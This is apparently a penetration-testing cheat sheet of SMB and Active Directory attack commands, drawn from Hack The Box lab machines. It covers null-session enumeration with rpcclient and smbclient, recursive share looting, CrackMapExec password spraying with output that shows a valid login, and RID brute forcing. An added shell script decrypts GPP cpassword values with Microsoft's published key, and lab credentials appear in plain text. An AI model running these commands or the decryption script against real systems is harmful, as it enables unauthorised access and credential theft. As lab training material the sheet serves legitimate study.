enum4linux
rpcclient
rpcclient -U '' 10.129.229.11
(press Enter at the password prompt, or add -N, for a null session)
rpcclient> enumdomusers
press Tab twice to list the available rpcclient commands
rpcclient> querydispinfo
smbclient
Null session (no credentials)
smbclient //10.129.230.0/support-tools -N
List shares with a null session
smbclient -L //IP -U '' -P ''
Connect to a share
smbclient //IP/IPC$
Connect and download recursively all resources
smbclient //10.129.229.121/Replication
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
smbmap
smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.129.229.121
Group Policy Preferences (GPP)
The cpassword attribute in GPP XML files (e.g. Groups.xml under SYSVOL, here pulled from the Replication share) is AES-256 encrypted with a key Microsoft published (MS14-025), so it decrypts offline:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
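Added example (not part of the original notes, and not the gpp-decrypt tool itself): a POSIX shell function that does the same decryption with openssl, so the step is not a black box. It assumes base64, openssl and iconv are installed; the key and zero IV are the ones Microsoft published in the GPP documentation, and the cpassword is the one from the command above.

```shell
#!/bin/sh
# Added example: offline GPP cpassword decryption, equivalent to gpp-decrypt.
# cpassword is base64(AES-256-CBC(UTF-16LE(password))) under a fixed key that
# Microsoft published (MS14-025), so no domain access is needed to recover it.
# Assumes base64, openssl and iconv are available (coreutils/openssl/glibc).

GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_AES_IV=00000000000000000000000000000000   # IV is sixteen zero bytes

# gpp_decrypt CPASSWORD -> prints the plaintext password
gpp_decrypt() {
    cpass=$1
    # cpassword values are stored without base64 padding; restore it
    case $(( ${#cpass} % 4 )) in
        2) cpass="${cpass}==" ;;
        3) cpass="${cpass}=" ;;
    esac
    # openssl strips the PKCS#7 padding; the result is UTF-16LE text
    printf '%s' "$cpass" \
        | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | iconv -f UTF-16LE -t UTF-8
}

# cpassword copied from the Groups.xml referenced by the notes above
gpp_decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
echo
```

After `mget *` of the Replication share, `grep -ri cpassword .` locates the XML files worth feeding to this function; any cpassword found this way is as good as a plaintext credential.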
CrackMapExec smb
Determine Password Policy
crackmapexec smb 10.129.228.111 --pass-pol
Check user/password lists for valid credentials
crackmapexec smb 10.129.96.157 -u ./users.txt -p ./passwords.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
RID bruteforcing (enumerate domain users and groups by looking up SIDs with incremented RIDs)
crackmapexec smb 10.129.96.157 -u hazard -p stealth1agent --rid-brute
Password bruteforce
Users / Users
Try every username as a password for every user (full cross-product of the list against itself)
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt --continue-on-success
Users / Username (1)
Try each username only as its own password (--no-bruteforce pairs line N of -u with line N of -p, one attempt per user)
crackmapexec smb 10.10.85.7 -u ./users.uniq -p ./users.uniq --continue-on-success --no-bruteforce
Users with empty password
Try every user with an empty password (one attempt per user)
crackmapexec smb 10.10.85.7 -u ./users.uniq -p '' --continue-on-success --no-bruteforce